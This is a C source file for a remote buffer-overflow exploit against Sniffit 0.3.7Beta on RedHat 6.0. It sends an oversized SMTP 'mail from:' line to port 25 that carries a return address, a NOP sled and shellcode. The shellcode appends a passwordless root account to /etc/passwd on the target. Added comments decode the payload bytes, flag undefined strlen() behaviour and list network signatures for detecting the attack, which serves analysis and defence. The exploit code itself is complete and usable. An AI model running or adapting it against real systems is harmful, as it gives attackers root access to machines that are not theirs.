Sniffit 0.3.7Beta Remote Exploit - sniffit has to be running with the (-L mail) flag set for this to work. Tested on RedHat 6.0.
b573a5413280903555b0ee0798458bf852149647ac3a38ccab820bebcba4ba44
/*
Sniffit 0.3.7Beta Remote Exploit
sniffit has to be running with the (-L mail) flag set for this to work.
bug discovery by http://www.s0ftpj.org
tested on RedHat 6.0
this will get you a root line in /etc/passwd
-->snip...
# tail -1 /etc/passwd
n0ir::0:0:mr. noir:/:/bin/sh
<--end...
greetz: gov-boi, CronoS, dustdvl, calaz, everyone at gsu-linux
exploit code by noir@gsu.linux.org.tr | noir@olympos.org
http://www.olympos.org
[RET]{NOP}[shellcode]
3 May 2000
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/time.h>
/*
 * Payload copied into the overflow buffer by main() (at offset 603).
 * The array has 136 initializers and NO trailing 0 byte, which matters
 * because main() measures it with strlen() (see the note there).
 *
 * What the bytes contain, read straight off the table below:
 *   - 0xcd 0x80 ("int 0x80") occurs three times, i.e. three Linux
 *     syscalls; together with the header's description ("a root line in
 *     /etc/passwd") this is an open/write/exit sequence.
 *   - 0x2f 0x65 0x74 0x63 0x2f 0x70 0x61 0x73 0x73 0x77 0x64 is the ASCII
 *     string "/etc/passwd".
 *   - the tail from 0x6e 0x30 0x69 0x72 ... is the ASCII passwd entry the
 *     header quotes ("n0ir::0:0:mr. noir:/:/bin/sh" plus padding spaces).
 *   - the run of 0x90 in the middle is NOP padding.
 * Both ASCII strings travel in cleartext inside the SMTP "mail from:" line,
 * so they are usable as content signatures for this payload.
 */
unsigned char shellcode[]= {
0xeb, 0x03, 0x5f, 0xeb, 0x05, 0xe8, 0xf8, 0xff,
0xff, 0xff, 0x31, 0xdb, 0xb3, 0x35, 0x01, 0xfb,
0x30, 0xe4, 0x88, 0x63, 0x0b, 0x31, 0xc9, 0x66,
0xb9, 0x01, 0x04, 0x31, 0xd2, 0x66, 0xba, 0xa4,
0x01, 0x31, 0xc0, 0xb0, 0x05, 0xcd, 0x80, 0x89, /* first int 0x80 */
0xc3, 0x31, 0xc9, 0xb1, 0x5b, 0x01, 0xf9, 0x31,
0xd2, 0xb2, 0x1d, 0x31, 0xc0, 0xb0, 0x04, 0xcd, /* second int 0x80 ... */
0x80, 0x31, 0xc0, 0xb0, 0x01, 0xcd, 0x80, 0x2f, /* ... third; then "/etc/passwd" starts */
0x65, 0x74, 0x63, 0x2f, 0x70, 0x61, 0x73, 0x73,
0x77, 0x64, 0x01, 0x90, 0x90, 0x90, 0x90, 0x90, /* "...wd", then NOP padding */
0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x6e, 0x30, 0x69, 0x72, 0x3a, /* "n0ir:" -- passwd entry text begins */
0x3a, 0x30, 0x3a, 0x30, 0x3a, 0x6d, 0x72, 0x2e,
0x20, 0x6e, 0x6f, 0x69, 0x72, 0x3a, 0x2f, 0x3a,
0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20              /* trailing spaces; no 0 terminator */
};
int resolv(char *hname, struct in_addr *addr);
/*#define RET 0xaabbccdd marker lvalue*/
#define RET 0xbfff5ba3 /*RedHat 6.0 (hedwig)*/
#define NOP 0x90
/*
 * Entry point.  Builds one oversized SMTP "mail from:" line in ovf[] and
 * writes it to TCP port 25 of the host named in argv[1]; per the file
 * header, sniffit's mail logging (-L mail) is what parses that line.
 *
 * Layout of ovf[] as assembled by the loops below (offsets in bytes):
 *   [0, 11)    0x41 filler; the first 10 bytes are later overwritten with
 *              "mail from:"
 *   [11, 230)  the value addr, stored repeatedly at a 4-byte stride
 *   [230, 603) 0x90 (NOP)
 *   [603, ...) the bytes of shellcode[]
 * which is the [RET]{NOP}[shellcode] order named in the header.
 *
 * argv[1]  host name or dotted-quad address, resolved by resolv()
 * argv[2]  optional decimal offset added to RET (atoi(), unchecked)
 *
 * Exit status: 0 after sending (or on the usage message), 255 (exit(-1))
 * when socket(), resolv() or connect() fails.  Nothing is read back from
 * the socket and fd is never closed explicitly.
 *
 * Correctness note for the reader: ovf[] is never NUL-terminated (every
 * byte is 0x90, 0x41, an address byte or a shellcode byte, none of which
 * is 0), and shellcode[] has no trailing 0 either, so every strlen() call
 * below reads past the end of its array -- undefined behaviour.  The loop
 * bounds, and the number of bytes finally written to the socket, depend on
 * whatever happens to follow those arrays in memory.
 *
 * Detection note: the line on the wire is hundreds of bytes long, contains
 * a 4-byte pointer repeated dozens of times, a long run of 0x90, and the
 * cleartext strings "/etc/passwd" and "n0ir::0:0:mr. noir:/:/bin/sh".
 */
int
main(int argc, char *argv[])
{
int fd;                         /* TCP socket to the target's port 25 */
int i, l;
int align = 11;                 /* bytes [0, align) are filler before the first address slot */
unsigned long eip = RET, addr = 0, offset = 0;  /* RET is the RedHat 6.0 value from the #define */
unsigned char ovf[812];         /* the "mail from:" line; no byte of it is ever 0 */
struct sockaddr_in servaddr;
if (argc < 2){
fprintf(stderr,"Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n");
fprintf(stderr,"Olympos Security Team http://www.olympos.org\n");
fprintf(stderr,"bug discovery by FuSyS of s0ftpj.org\n");
fprintf(stderr,"\nUsage: %s <serv> [offset]\n\n",argv[0]);
exit(0);
}
if( (fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){
perror("socket");
exit(-1);                       /* exit status 255 */
}
bzero(&servaddr, sizeof(servaddr));   /* legacy BSD call, same effect as memset(..., 0, ...) */
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(25);        /* SMTP */
if(!resolv(argv[1], &servaddr.sin_addr)){
herror("gethostbyname");              /* resolv() returns 0 only after gethostbyname() failed, so h_errno is meaningful here */
exit(-1);
}
if(connect(fd, (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0 ){
perror("connect");
exit(-1);
}
printf("Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n");
printf("Olympos Security Team http://www.olympos.org\n");
printf("bug discovery by FuSyS of s0ftpj.org\n");
if(argv[2])                           /* argv[argc] is NULL per the C standard, so this is safe when argc == 2 */
offset = atoi(argv[2]);               /* atoi() reports no errors; non-numeric input becomes 0 */
addr = eip + offset;
memset(ovf, NOP, sizeof(ovf));        /* start with an all-0x90 buffer */
for( i = 0 ; i < align; i++) ovf[i] = 0x41;
/* Fill the rest with addr at a 4-byte stride.  strlen(ovf) is undefined
 * here (see the function comment).  The store goes through an unaligned
 * (long *) cast and writes sizeof(long) bytes per step: 4 on the 32-bit
 * x86 this targets; on a 64-bit build the stores would overlap. */
for( i = align; i < strlen(ovf) ; i+=4)
*((long *) &ovf[i]) = addr;
for( i = 230; i < strlen(ovf); i++) ovf[i] = 0x90;   /* restore NOPs from 230 on, undoing the address fill there */
/* Copy shellcode[] in at 603.  strlen(shellcode) is undefined too (no 0
 * byte in that array); 603 + 136 fits in 812 only if strlen() happens to
 * stop within 209 bytes of the array's start. */
for( i = 603, l = 0; l < strlen(shellcode); i++, l++)
ovf[i] = shellcode[l];
printf("eip: 0x%lx\n", addr);
memcpy(ovf, "mail from:",10);         /* overwrite the first 10 filler bytes with the SMTP verb (no terminator copied) */
write(fd, ovf, strlen(ovf));          /* return value unchecked; length again from an undefined strlen() */
write(fd, "\r\n\n", 3);               /* end the SMTP line; return value unchecked */
return 0;
}
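/*
 * Resolve hname into *addr.
 *
 * A dotted-quad string is converted directly with inet_aton() (declared in
 * <arpa/inet.h>, which this file does not include); anything else goes
 * through gethostbyname().  The caller (main) reports the failure with
 * herror(), so on the lookup path we only return 0 after gethostbyname()
 * has set h_errno.
 *
 * hname  host name or IPv4 address text
 * addr   receives the IPv4 address on success
 * Returns 1 on success, 0 on failure.  A reply whose address family or
 * length does not fit a struct in_addr is rejected instead of being
 * copied in part (gethostbyname() normally yields AF_INET, so this is
 * a guard, not an expected path).
 */
int
resolv(char *hname, struct in_addr *addr)
{
	/* Numeric form first: no lookup and no h_errno side effect. */
	if (inet_aton(hname, addr))
		return 1;

	struct hostent *hp = gethostbyname(hname);
	if (hp == NULL)
		return 0;

	/* Only copy when the reply is exactly one IPv4 address. */
	if (hp->h_addrtype != AF_INET || hp->h_length != (int) sizeof *addr
	    || hp->h_addr_list == NULL || hp->h_addr_list[0] == NULL)
		return 0;

	memcpy(addr, hp->h_addr_list[0], sizeof *addr);
	return 1;
}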